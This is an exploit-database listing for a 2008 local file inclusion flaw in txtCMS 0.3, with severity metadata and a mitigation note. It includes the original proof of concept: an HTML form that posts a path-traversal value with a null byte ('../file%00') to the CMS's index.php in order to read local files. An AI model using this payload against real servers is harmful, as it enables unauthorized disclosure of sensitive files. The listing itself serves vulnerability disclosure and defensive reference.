header-logo
Suggest Exploit
vendor:
txtCMS
by:
cOndemned
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: txtCMS
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: NO
Related CWE: N/A
CPE: txtcmsv0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

txtCMS 0.3 (index.php) Local File Inclusion Exploit

txtCMS 0.3 is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit this vulnerability to include a file from the local host which may lead to the disclosure of sensitive information.

Mitigation:

Disable register_globals and enable magic_quotes_gpc.
Source

Exploit-DB raw data:

<!--
Name : txtCMS 0.3 (index.php) Local File Inclusion Exploit
Author : cOndemned
Conditions : Register_globals = On / Magic_quotes_gpc = Off
Greetz : irk4z, GregStar, ZaBeaTy, ElusiveN, Avanturka :***
-->

<html>
<head>
<title>txtCMS 0.3 (index.php) Local File Inclusion Exploit</title>
</head>
<body>
<form action="http://target.host/txtcmsv0.3/index.php" method="POST">
<input type="text" name="id" value="../file%00">
<input type="submit" value="show">
</form>
</body>
</html>

# milw0rm.com [2008-05-09]

Navigation

Suggest Exploit

Services By CQR